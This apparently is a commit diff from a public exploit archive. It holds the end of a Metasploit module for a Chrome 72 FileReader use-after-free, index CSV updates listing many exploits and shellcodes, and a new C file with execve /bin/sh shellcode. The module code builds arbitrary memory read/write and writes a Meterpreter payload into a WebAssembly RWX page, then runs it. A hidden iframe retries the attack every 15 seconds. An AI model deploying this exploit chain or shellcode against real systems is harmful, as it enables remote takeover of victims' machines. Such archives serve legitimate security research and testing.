// leak the absolute address of the Object
const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential
ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4
console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);
console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);
reader_obj = get_obj_idx(object_prop_taidx);
if (reader_obj == undefined) {
console.log(`ERROR> failed to find object`);
window.top.postMessage(`ERROR> failed to find object`, '*');
return;
}
// now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray
console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);
aarw_ui32 = get_corruptable_ui32a();
// arbitrary read write up after this point
}
var wfunc = null;
let meterpreter = unescape("#{Rex::Text.to_unescape(payload.encoded)}");
function rce() {
function get_wasm_func() {
var importObject = {
imports: { imported_func: arg => console.log(arg) }
};
bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
wasm_code = new Uint8Array(bc);
wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
return wasm_mod.exports.exported_func;
}
let wasm_func = get_wasm_func();
wfunc = wasm_func;
// traverse the JSFunction object chain to find the RWX WebAssembly code page
let wasm_func_addr = addrof(wasm_func) - 1;
let sfi = read4(wasm_func_addr + 12) - 1;
let WasmExportedFunctionData = read4(sfi + 4) - 1;
let instance = read4(WasmExportedFunctionData + 8) - 1;
let rwx_addr = read4(instance + 0x74);
// write the shellcode to the RWX page
if (meterpreter.length % 2 != 0)
meterpreter += "\\u9090";
for (let i = 0; i < meterpreter.length; i += 2) {
write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);
}
// if we got to this point, the exploit was successful
window.top.postMessage('SUCCESS', '*');
console.log('success');
wfunc();
// invoke the shellcode
//window.setTimeout(wfunc, 1000);
}
function force_gc() {
// forces a garbage collection to avoid OOM kills
try {
var failure = new WebAssembly.Memory({initial: 32767});
} catch(e) {
// console.log(e.message);
}
}
function init() {
abs = [];
tarray = 0;
onprogress_cnt = 0;
try_cnt = 0;
last = 0, lastlast = 0;
reader = new FileReader();
reader.onloadend = function(evt) {
try_cnt += 1;
failure = false;
if (onprogress_cnt < 2) {
console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);
failure = true;
}
if (lastlast.byteLength != f.size) {
console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);
failure = true;
}
if (failure === true) {
console.log('retrying in 1 second');
window.setTimeout(exploit, 1);
return;
}
console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);
try {
// trigger the FREE
myWorker.postMessage([last], [last, lastlast]);
} catch(e) {
// an exception with this message indicates that the FREE part of the exploit was successful
if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {
get_rw();
rce();
return;
} else {
console.log(e.message);
}
}
}
reader.onprogress = function(evt) {
force_gc();
let res = evt.target.result;
// console.log(`onprogress ${onprogress_cnt}`);
onprogress_cnt += 1;
if (res.byteLength != f.size) {
// console.log(`result has a different size than expected: ${res.byteLength}`);
return;
}
lastlast = last;
last = res;
}
if (spray === null) {
// allocate the spray holders if needed
allocate_spray_holders();
}
// clear the spray holder arrays
clear_spray();
// get rid of the reserved ArrayBuffer range, as it may interfere with the exploit
try {
let failure = new ArrayBuffer(1024 * 1024 * 1024);
} catch (e) {
console.log(e.message);
}
force_gc();
}
function exploit() {
init();
reader.readAsArrayBuffer(f);
console.log(`attempt ${try_cnt} started`);
}
</script>
</head>
<body onload="exploit()">
</body>
</html>
^
send_response(cli, html)
elsif request.uri =~ %r{/worker.js$}
send_response(cli, 'onmessage = function (msg) { }')
else
uripath = datastore['URIPATH'] || get_resource
uripath += '/' unless uripath.end_with? '/'
html = %Q^
<html>
<head>
<script>
function iter() {
let iframe = null;
try {
iframe = document.getElementById('myframe');
document.body.removeChild(iframe);
} catch (e) {}
iframe = document.createElement('iframe');
iframe.src = '#{uripath}exploit.html';
iframe.id = 'myframe';
iframe.style = "width:0; height:0; border:0; border:none; visibility=hidden"
document.body.appendChild(iframe);
console.log(document.getElementById('myframe'));
}
function brute() {
window.setTimeout(iter, 1000);
let interval = window.setInterval(iter, 15000);
window.onmessage = function(e) {
if (e.data.includes('SUCCESS')) {
console.log('exploit successful!');
window.clearInterval(interval);
}
console.log(e);
}
}
</script>
</head>
<body onload="brute()"></body>
</html>
^
send_response(cli, html)
end
end
end

7
files_exploits.csv
View file

@ -6410,6 +6410,7 @@ id,file,description,date,author,type,platform,port
46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10455,6 +10456,7 @@ id,file,description,date,author,type,platform,port
46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
46807,exploits/linux/local/46807.txt,"MiniFtp - 'parseconf_load_setting' Buffer Overflow",2019-05-08,strider,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17384,6 +17386,10 @@ id,file,description,date,author,type,platform,port
46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
46795,exploits/hardware/remote/46795.rb,"LG Supersign EZ CMS - Remote Code Execution (Metasploit)",2019-05-06,"Alejandro Fanjul",remote,hardware,9080
46797,exploits/windows/remote/46797.py,"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)",2019-05-06,ElSoufiane,remote,windows,80
46808,exploits/windows/remote/46808.py,"Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE)",2019-05-08,"Charles Truscott",remote,windows,143
46812,exploits/windows_x86/remote/46812.rb,"Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)",2019-05-08,Metasploit,remote,windows_x86,
46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432
46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41234,3 +41240,4 @@ id,file,description,date,author,type,platform,port
46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80
46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -963,3 +963,4 @@ id,file,description,date,author,type,platform
46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86

1 id file description date author type platform
963 46791 shellcodes/linux_x86/46791.c Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes) 2019-05-03 strider shellcode linux_x86
964 46800 shellcodes/generator/46800.txt Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) 2019-05-06 Xavi Beltran shellcode generator
965 46801 shellcodes/linux_x86/46801.txt Linux/x86 - shred file Shellcode (72 bytes) 2019-05-06 strider shellcode linux_x86
966 46809 shellcodes/linux_x86/46809.c Linux/x86 - execve /bin/sh Shellcode (20 bytes) 2019-05-08 Rajvardhan shellcode linux_x86

31
shellcodes/linux_x86/46809.c Normal file
View file

@ -0,0 +1,31 @@
/*
# Linux/x86 - execve /bin/sh shellcode (20 bytes)
# Author: Rajvardhan
# Tested on: i686 GNU/Linux
# Shellcode Length: 20
Disassembly of section .text:
08049000 <.text>:
8049000: 31 c9 xor %ecx,%ecx
8049002: 6a 0b push $0xb
8049004: 58 pop %eax
8049005: 51 push %ecx
8049006: 68 2f 2f 73 68 push $0x68732f2f
804900b: 68 2f 62 69 6e push $0x6e69622f
8049010: 89 e3 mov %esp,%ebx
8049012: cd 80 int $0x80
===============poc by Rajvardhan=========================
*/
#include<stdio.h>
#include<string.h>
unsigned char shellcode[] = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}